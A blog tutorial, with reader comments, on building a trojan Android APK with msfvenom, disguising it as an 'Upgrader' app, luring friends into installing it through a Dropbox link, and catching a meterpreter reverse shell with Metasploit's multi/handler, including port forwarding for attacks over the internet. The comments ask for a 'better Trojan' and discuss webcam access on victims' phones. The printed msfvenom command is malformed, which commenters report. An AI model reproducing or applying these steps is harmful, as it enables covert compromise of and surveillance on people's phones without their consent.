in , , ,

Hack any Android Phone Using Metasploit on Kali Linux

Kali Linux Tutorials – How To Hack Android Phone

How To Hack Any Android Phone using Metasploit on Kali Linux?kali rolling 2016.1 tutorials hack android

We knew that Hackers can Hack any device and any system but What about Android? As Penetration testers you need to learn all types of Hackings on different systems!

On K4linux we will share with you a series of courses that will teach you skills of a perfect hacker! Read more about Penetration Testing With Kali Linux.

Disclaimer: This tutorial is for educational purposes only and we are NOT responsible in any way for how this information is used, use it at your own risk.

Step 1 Fire-Up Kali:



Open a terminal, and make a Trojan .apk you can do this by typing :

root@kali:~# msfvenom android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)
Hack Android Phone on kali Rolling using Metasploit k4linux

Step 2 Open Another Terminal:

Open another terminal until the file is being produced. Load metasploit console, by typing :

root@kali:~# msfconsole
Hack Android Phone on kali Rolling using Metasploit k4linux

Step 3 Set-Up a Listener:



 After it loads(it will take time), load the multi-handler exploit by typing :

root@kali:~# use exploit/multi/handler

Hack Android Phone on kali Rolling using Metasploit k4linux
Set up a (reverse) payload by typing :
root@kali:~# set payload android/meterpreter/reverse_tcp
To set L host type :
root@kali:~# set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)
Hack Android Phone on kali Rolling using Metasploit k4linux

Step 4 Exploit!



At last type: exploit to start the listener.

Hack Android Phone on kali Rolling using Metasploit k4linux

Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
Then send it using Uploading it to Dropbox or any sharing website.
Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)

Let the Victim install the Upgrader app (as he would think it is meant to upgrade some features on his phone)

However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
And when he clicks Open…

Step 5 BOOM!

There comes the meterpreter prompt:
Hack Android Phone on kali Rolling using Metasploit k4linux

All the steps for this tutorial are explained on a Video on our Youtube Channel you can subscribe to it by this link they are many other tutorials that you can learn about bypassing and hacking and others basics tutorials about kali linux.



If you have encountered a problem or you have any questions or remarks please feel free to set a comment.

If this article helped you to solve your problem please feel free to Share it with your friends. with Love and Prosperity K4LINUX-TEAM.


Source  : nb

Comments

18 Comments

Leave a Reply
  1. When I'm creating the .apk file, it don't take more than à Byte :/ so, I can't transfer it via Dropbox and I'm guessing that a file where there is no information will not be usable.. Plus, the msfvenom return that there is no option set :/

    Sorry for my English, I'm not from a english speaking country 🙁

  2. Im trying to port forward but it is asking for local port and wan port in my router rather than port range …which ports am i have to enter….help me with this

  3. how can I create or get static public ip adress for lhost ip.. my internet connection ip adress is dyanamic ….

  4. This is not very good Trojan…I need better Trojan…This works well on LAN which is not available for most cases…but even if you use it in wan by port forwarding then also the Trojan stops working if the victim reboots the android…again if you want to make it sustainable you must place the apk in the root directory of the victim’s phone WHICH IS ALSO NOT POSSIBLE IF THE PHONE IS NOT ROOTED..unfortunately the conditions will not be satisfied….

    Moreover the webcam_show,webcam,stream e.t.c are very very laggy…due to poor communication efficiency…

    I don’t know if it can be improved….

  5. Böyle bir hata veriyor.

    root@kali:~# msfvenom -msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.194 R > /root/Desktop/upg.apk
    Error: Invalid option
    MsfVenom – a Metasploit standalone payload generator.
    Also a replacement for msfpayload and msfencode.
    Usage: /usr/bin/msfvenom [options]

Leave a Reply

Your email address will not be published. Required fields are marked *